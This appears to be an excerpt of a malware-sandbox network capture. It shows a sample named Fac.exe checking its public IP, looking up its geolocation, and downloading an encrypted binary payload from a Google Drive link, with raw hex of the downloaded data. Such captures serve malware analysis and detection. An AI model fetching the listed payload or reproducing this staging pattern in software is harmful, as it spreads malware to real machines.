Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49774	193.122.6.168	80	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 14:53:27.943613052 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 14:53:28.120629072 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:28 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 46d018d1e296778d12e3faa1d410f590 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.191</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49776	193.122.6.168	80	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 14:53:28.743401051 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 14:53:28.920825958 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:28 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7f5317e38d97b24adb0d032bffe16212 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.191</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49778	193.122.6.168	80	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 14:53:29.557046890 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 14:53:29.734142065 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:29 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3c316129815d395bb0062a96264c2bb7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.191</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49780	193.122.6.168	80	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 14:53:30.370964050 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 14:53:30.547996044 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:30 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 528ad1d5fe4fb3d1968612f0ed6f923f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.191</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49782	193.122.6.168	80	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 14:53:31.189558983 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 14:53:31.366276979 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:31 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 88381341bc3b6e34a945a0e598138174 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.191</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49784	193.122.6.168	80	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 14:53:32.003535986 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 14:53:32.357707024 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6c7aea2aa8a848a2a67f63513ffd3680 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.191</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49767	142.251.41.14	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:19 UTC	216	OUT	GET /uc?export=download&id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt- HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-11-18 13:53:20 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 18 Nov 2024 13:53:20 GMT Location: https://drive.usercontent.google.com/download?id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-r6Wrzk_Jl-ZEi_qms7GWTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49768	142.250.72.97	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:20 UTC	258	OUT	GET /download?id=1Agb6c2PBuU8CPrXOngOV7_bHJQ4DUnt-&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-11-18 13:53:23 UTC	4922	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="yiCUCaYYzUAgdmvPaMjYzIE0.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 275520 Last-Modified: Thu, 14 Nov 2024 21:41:24 GMT X-GUploader-UploadID: AFiumC4ajcPsD7-1MgiikCSA2H8kyb6-rK2K3qste6SUcs3YZm0hpmz-CBsXmxe2QUGrIgXdyQ Date: Mon, 18 Nov 2024 13:53:22 GMT Expires: Mon, 18 Nov 2024 13:53:22 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=12NIdQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-18 13:53:23 UTC	4922	IN	Data Raw: b9 ff 1d 51 1b 68 50 d4 5b 0a d1 48 6d 7b d2 cc 45 5f 39 97 8d 97 49 0e 1b f7 2e f3 15 15 f1 81 44 e1 9f 66 8b 2d f4 18 9d 92 8c 7e 40 7b 15 71 2d 15 8d 35 88 1a 87 63 b2 80 1c 8c 90 b4 47 38 37 b4 9a c3 09 8f f0 19 11 50 70 d1 4a 89 4e 8b b5 72 38 64 9e df a7 72 3c 47 7d 28 e7 97 48 75 80 51 0f d4 6d 6a e2 f9 c4 d3 a2 6d b6 90 d7 2a d9 ac fa 2f c9 6a 7f 3e 26 7e 75 37 e4 f2 0c 47 60 43 37 43 b9 b1 dc bf dc 33 05 1e 76 ac 3b 15 dd bc 5b 7a 24 62 ca 55 ed bf 2f f9 1d 33 85 32 65 83 b4 e3 2c 73 ac f3 d8 ba fb 5f b2 01 12 d9 b8 43 7d 41 b3 f3 c3 f2 00 04 c3 a2 ce 35 94 33 68 06 b9 a1 3b 0c 09 a1 3b 0f 28 0e f7 2e b6 a8 46 ce 42 e2 e0 77 01 23 eb a0 63 5f c8 da c6 34 34 d4 5e c7 64 45 c3 e3 44 50 72 29 a0 fa b2 d9 22 a4 eb 49 c1 98 cd ba 55 14 f5 35 45 2f 8b Data Ascii: QhP[Hm{E_9I.Df-~@{q-5cG87PpJNr8dr<G}(HuQmjm*/j>&~u7G`C7C3v;[z$bU/32e,s_C}A53h;;(.FBw#c_44^dEDPr)"IU5E/
2024-11-18 13:53:23 UTC	4855	IN	Data Raw: 55 24 ac 3b f2 52 c2 95 21 c0 84 1a 35 b6 19 30 f0 19 69 60 d1 c7 6a 8a 0c ba 87 0e 7d 1a 01 8a b8 0c a4 e9 33 4a 8e 19 5e d8 45 6e e1 1a 9f 49 85 6d 10 26 d3 0d be 8e c7 76 d9 e0 9c 4f 21 e2 cd 6d f4 4b 95 51 65 e7 be 9d c5 e1 ad ae d4 03 3e e4 ac 89 d0 13 52 fb 3c 13 6a bb ba d7 f7 82 6d d6 69 21 76 01 67 a7 94 2f 83 60 c2 6b 69 7e 7a e4 7e 58 72 9e 62 89 ff 1f 52 f5 fa 62 ee 36 e4 6a 1a 20 99 27 f2 9e bf 24 a0 8b 9b 29 7e 4c 6c 03 33 11 be 11 b6 25 34 30 34 f2 f8 b7 16 63 f5 6e 6c 5e 43 f5 ff 49 87 f1 77 4e 28 0a 74 73 ab ff 6b 3c 10 6e d5 0e 98 da 0f c4 fb ca c2 61 f5 5f 79 1c 84 6e db 96 2e 6b 5b 23 d0 1a b1 af 12 67 a7 cf 5f 23 81 27 75 d4 75 ab 9f ba ac 92 bd 09 34 87 0f a1 46 74 48 1e 20 10 e2 65 5e 89 dc ca ef 50 d2 db ff d4 88 a9 3e c4 61 03 50 Data Ascii: U$;R!50i`j}3J^EnIm&vO!mKQe>R<jmi!vg/`ki~z~XrbRb6j '$)~Ll3%404cnl^CIwN(tsk<na_yn.k[#g_#'uu4FtH e^P>aP
2024-11-18 13:53:23 UTC	1255	IN	Data Raw: 8c d8 d2 c4 7a 5d eb 5d 11 a3 a8 b4 0c 01 dd ef 6d d1 95 0f e0 66 c0 f9 d5 26 0f da 9c ed c8 e9 22 3d 00 a0 ce 35 ea 1c 38 43 bd d3 16 1d 0a d1 f4 a2 39 68 f7 24 a0 56 47 dd 45 f3 07 4e 33 23 e0 a1 33 4b 36 c2 ff 34 34 c6 2d 07 64 45 c9 cb 8b 6c 76 23 a0 a9 70 d9 22 ee fc 41 d0 90 f3 80 55 34 f1 46 86 2d 8b 3f 4f 88 3b 5f 36 a8 6a 56 75 7f 9c af 1c 79 d6 d2 39 dd e0 8f 9a bb 80 8d 41 aa 96 2c ed e3 45 f1 f1 ee 23 56 4a 68 5c 41 74 9c 66 8d 81 da f3 a2 52 f9 d1 69 37 19 92 ac fd 4e 06 ff 6b 24 f3 6c a4 1e ab 66 78 af d5 e0 3a 9d 89 2a 7d 62 89 c8 6c f3 8b 38 aa 1e c6 53 15 8b b2 f7 32 fc 65 45 e0 7c 24 fb 40 3b ea e7 e1 18 f8 75 5a 0f f0 7c 43 a3 22 8f 13 ea af e6 62 17 fb 4c 95 ea 32 6e b8 76 7f 9c 02 1d 4d 1b bc 75 09 8c f2 9d ac f8 61 7e 15 b9 73 1e 2c Data Ascii: z]]mf&"=58C9h$VGEN3#3K644-dElv#p"AU4F-?O;_6jVuy9A,E#VJh\AtfRi7Nk$lfx:*}bl8S2eE\|$@;uZ\|C"bL2nvMua~s,
2024-11-18 13:53:23 UTC	68	IN	Data Raw: 82 8b 92 52 a9 ed 28 b8 d7 f1 8b 5a 47 99 83 9e 1b 51 ab df 5d be 7f f7 db 3d ae 99 65 97 e8 7b d9 51 e9 2f 5f 1c a3 73 22 5e 5b a8 86 80 94 5f 32 26 f9 5d e9 73 5a d8 b0 71 7d 2d 50 c7 00 ee 0c 81 5c 6b Data Ascii: R(ZGQ]=e{Q/_s"^[_2&]sZq}-P\k
2024-11-18 13:53:23 UTC	1255	IN	Data Raw: dd cb 72 a3 1a 41 91 c1 e0 98 d7 25 ae c7 ce 62 c5 5e e4 ce a9 2a 5b 5d d4 57 b4 55 85 3f ab fa 9d 23 45 2e 37 6d 0d b0 b4 00 29 93 eb c7 0e 77 f8 7a bb c0 2a 43 d2 a3 ec e5 eb 9b 40 1a be 56 7b 1f bf 08 2b 30 f1 7b 8f 86 39 6f 42 01 ed cf b6 b2 c3 21 f2 bf 8c d5 b3 9f e3 36 cd 5a 27 57 f3 8e f2 27 10 18 25 d9 d1 1a c3 6a 13 eb 60 4d d4 ec 8f 2e 97 d3 ed 16 8b df ad 4b a6 91 fc b2 45 55 76 b4 1d fd ee ae fa f8 4b 2d 6e 56 d6 2e 32 ee 63 d3 ca 8b 68 41 08 5a 1a c6 33 3d 26 49 46 7b 05 33 ea b7 d4 4e 0f ff ee 0f 94 ba a4 70 51 34 35 e2 1f 0d a1 ac 9b 73 6f 19 e7 00 f5 de 56 ec 3d 06 69 38 14 f5 70 a8 0e 13 8c a7 1b cb ae 30 17 33 72 12 7f 1f b9 cb f6 29 cd 4d 16 6e ca c4 2b 95 91 aa 9c 11 b9 00 b4 57 71 62 68 e0 8d 94 01 c5 81 ad 94 52 69 17 01 f9 1f 25 81 Data Ascii: rA%b^[]WU?#E.7m)wzC@V{+0{9oB!6Z'W'%j`M.KEUvK-nV.2chAZ3=&IF{3NpQ45soV=i8p03r)Mn+WqbhRi%
2024-11-18 13:53:23 UTC	1255	IN	Data Raw: d6 b2 49 cf 10 62 2a 52 13 64 9d 3c ac 03 d7 07 53 8f 96 65 97 96 f8 49 37 b7 96 fc 87 9b 81 5b 85 ef f1 25 5e 40 ed be b0 e6 af 9d d1 e9 88 a7 6c 71 b9 b4 7e e9 8d 77 04 95 87 9b 53 85 57 a1 d8 9a b5 9c 75 0e 65 1e 82 b2 97 96 6a 1d 19 9c c4 ce 0c 96 42 37 ba 80 a6 9c 79 7b 51 01 91 b0 df 07 7c 33 e2 69 89 17 1e c4 b8 0d 6e 6d 8d 79 04 5e c0 9a a5 2b cb d5 20 29 c3 13 f7 dd ff d4 77 bc d4 b8 dd 4e 9f f7 3e 1f 49 5f fb 35 b3 b8 9b 1f 22 d6 a0 01 e3 0b 7e d6 d7 a8 c7 c1 9e 24 9a a3 0d 6a df 3c 56 c4 55 8f 1e 1c 35 2a db fd ba 0d 47 a7 00 e5 2f cb 0b 5f 30 2d 33 5a 46 16 ef 23 a1 42 2b 37 4e 9d 99 9e ce c6 3f 71 2a 8e 2e 95 6c d5 4c 03 3a 96 be d2 b6 df 18 e4 26 3b a2 ac 2a f7 94 c8 d3 07 9b 54 33 4a 76 61 f8 f4 f4 94 66 c4 31 8d 2e 9c 39 56 bc 26 e8 82 f6 Data Ascii: IbRd<SeI7[%^@lq~wSWuejB7y{Q\|3inmy^+ )wN>I_5"~$j<VU5G/_0-3ZF#B+7N?q.lL:&;T3Jvaf1.9V&
2024-11-18 13:53:23 UTC	1255	IN	Data Raw: 5a 12 8b 04 58 bb 8d 6f a3 d9 c8 6c 52 40 06 e8 20 8c d2 0f 9a 7c 5d eb c9 ee 5c 29 33 f3 fe 26 23 07 2c 6a b3 09 b1 be 2f 2a d3 e6 fc 62 01 31 26 1e 0c c8 a4 d1 cb a4 30 2f 68 b8 a7 32 0f 0a a1 e2 8a b8 68 f7 ee 49 57 b9 10 62 97 45 77 03 23 f4 5f 30 59 de 3a c1 6b 33 d6 a0 c6 3b bb d2 97 0f 6c 76 28 88 ee b2 d9 28 3a 29 69 f2 98 87 3a 7d b0 f5 35 4f 57 8c 19 26 64 59 5f 3c a2 7b 74 1a bb 8c af 16 06 eb d3 39 50 11 49 96 31 8a 8d 50 b1 d4 af fd bf 35 d9 45 f1 23 5c 29 f5 51 cc 44 b4 3d 8c a4 c6 ee 6c 47 f9 ab cb 03 06 a7 95 bd 4e 0c 5c 6b 2a f3 02 a4 1e ab 66 78 a1 83 6c 3a 9d 87 2a 7d 60 89 e4 6c f3 8b 38 aa 1c c6 77 15 8b b2 3a f9 e6 17 36 4d 59 48 2b 50 34 94 bd 43 30 89 d7 7f 19 89 d3 f9 a3 52 27 3c f0 f3 e6 68 72 3f 44 9f cb 32 16 ae 6d 4f 91 71 10 Data Ascii: ZXolR@ \|]\)3&#,j/b1&0/h2hIWbEw#_0Y:k3;lv((:)i:}5OW&dY_<{t9PI1P5E#\)QD=lGN\kfxl:*}`l8w:6MYH+P4C0R'<hr?D2mOq
2024-11-18 13:53:23 UTC	1255	IN	Data Raw: 08 77 7f 09 93 ae 6d cf 79 be 5a 2d 01 0f 03 cd f3 be 8b 4f 21 d6 d6 28 9d fb b6 37 5a 4d 80 f3 53 33 33 a1 df 46 70 6e fa b4 f3 ae e7 5b 97 f9 72 c4 0b eb 2f 25 0a f9 a8 23 5e 21 3e 51 81 87 7b fd 16 e5 bb dd 73 5a fa f9 63 7d 0f 2f 4a 40 e4 d2 80 79 7d af f0 7d dd 5f e3 b4 d2 ba b9 d5 25 d4 73 c3 fb b7 0b e1 d8 27 89 6d 57 bb 7c 8d 55 83 9d 8e fd 62 1a 4a 2e 46 ea 3e d9 95 3f 29 e3 4d 40 3c 43 3e fd b4 ca f8 c4 e2 a4 b9 ea e1 84 be 3f a7 22 50 3e a4 81 c9 15 eb 08 d3 9f 4b fe f2 24 86 13 8f a5 eb 91 9d 51 86 77 9c 25 b4 7f b0 6f 43 f5 a6 35 a4 6a 10 18 2b 68 e0 7e 87 5b 10 ef 62 f0 ed 99 ff 38 b5 41 cf 00 a9 bf 53 4a bf 84 cd a7 70 83 76 9c 6a eb c6 d2 fa f8 3f 12 4e 56 de 3f 13 b4 1b c0 ca f1 16 4f 1c 72 ca ee 7a 37 35 55 25 68 6a 73 9a c9 fd 66 31 fb Data Ascii: wmyZ-O!(7ZMS33Fpn[r/%#^!>Q{sZc}/J@y}}_%s'mW\|UbJ.F>?)M@<C>?"P>K$Qw%oC5j+h~[b8ASJpvj?NV?Orz75U%hjsf1
2024-11-18 13:53:23 UTC	1255	IN	Data Raw: 56 df 65 db c2 1c 16 b0 d8 e2 cc 86 cc 7a 26 17 43 19 49 31 61 d1 d6 18 41 e4 d2 62 1e ff 36 9e e1 34 7a 84 cb a1 10 d8 58 23 eb 5f da 57 8e 80 45 10 03 ab 68 48 9f 72 ea 96 33 ab 0a 38 26 26 5a d3 47 db 7b 28 4c e1 b9 a9 6a a1 92 f8 31 02 23 44 39 30 7a a6 10 78 26 3e eb 2a 52 1f b5 78 24 de 5c f0 c6 23 2d b9 7c 9a 6c f8 49 39 06 b5 f7 f3 d4 b8 5b f5 49 a7 fd 20 60 e7 d1 70 44 8a 8b a3 cd 98 c8 d9 d3 91 cb 00 d4 87 7c 28 4f 41 9b 59 88 38 ec de e8 38 80 7d 74 66 aa 84 98 9d f7 c7 09 19 bb ec 95 0c 89 48 58 6c 80 bb 1b 39 6a 57 1b 39 e6 ad 2e 6b 16 84 b9 63 13 36 00 1a 28 73 e7 1c 61 76 01 6d bf cd fb bb c3 5e 61 61 36 ea 01 e2 ce 05 89 75 9d b7 9e 51 fc 40 4f eb 77 8a 97 96 ae 86 e2 34 d6 da a3 b5 55 7e d6 d9 d0 02 35 9e 2e 83 a3 73 30 b0 ed 5c c8 57 94 Data Ascii: Vez&CI1aAb64zX#_WEhHr38&&ZG{(Lj1#D90zx&>*Rx$\#-\|lI9[I `pD\|(OAY88}tfHXl9jW9.kc6(savm^aa6uQ@Ow4U~5.s0\W
2024-11-18 13:53:23 UTC	1255	IN	Data Raw: 18 2d 2d f4 4d 89 fd e0 75 a4 f4 12 ea 9e b7 ee 0a c9 0a 9e e1 08 19 3f be d1 b5 7c 4e 9a 01 1d f7 64 9e d5 a7 ac 6c 62 55 1c e7 97 42 66 93 51 27 b6 6d 6a e8 27 c4 d3 a2 6d b6 90 a9 1f d9 ac fe 5d 5c 68 7f 4e 30 56 f4 37 64 f8 1a b9 6f 4f 99 5c ad 3c 2e 73 fd 8b 19 df fb 8d 6f 7c 91 d9 09 23 40 0d dd 85 a9 c5 27 2e 7c 5d e1 ff 34 bb a4 d3 03 01 a9 3f dd ca eb 47 f6 4e 45 5b f0 36 6b 15 9e fe be 5a 01 1f bd 82 ce 35 90 91 1d 5f cb 94 61 0d 7a 03 ca ff b8 68 fd 3d a3 d6 70 ce 42 e6 72 68 12 22 90 b7 1b de c8 c4 c8 22 ca c1 4d d1 75 53 fa 35 4a 6c 76 3f 88 ac b2 d9 28 e4 cf 49 cd 98 8d 92 22 34 f5 3f 45 3c 9e 1d f4 4c 3b 55 2f bf 09 6f 0b ba ec d1 3b 07 eb d6 4b ee 9e 49 ea aa 9d a5 85 a2 e4 a1 ee fb 47 90 54 ee 53 74 6e f5 4c 4b 17 ad 2c 94 f3 b4 9b 65 22 Data Ascii: --Mu?\|NdlbUBfQ'mj'm]\hN0V7doO\<.so\|#@'.\|]4?GNE[6kZ5_azh=pBrh""MuS5Jlv?(I"4?E<L;U/o;KIGTStnLK,e"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49770	104.21.67.152	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:25 UTC	87	OUT	GET /xml/191.96.150.191 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 13:53:26 UTC	836	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:26 GMT Content-Type: text/xml Content-Length: 364 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: MISS Last-Modified: Mon, 18 Nov 2024 13:53:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZ8SXVNLIYBHPKH9hzbTUI2fnZ1XBUUBy7ywdu0aW6NcLrS87qxf89nqZg%2BxkGsf8SQc9iJl6IvuN8WfWZp2xBiYLSYF60xe6%2FxVoBaOsVekRtxOYEBjoTq5uNx3GqVwlnoSI7gu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e487258dca04289-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=95741&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=39896&cwnd=251&unsent_bytes=0&cid=be560f7fd7656eab&ts=588&x=0"
2024-11-18 13:53:26 UTC	364	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: 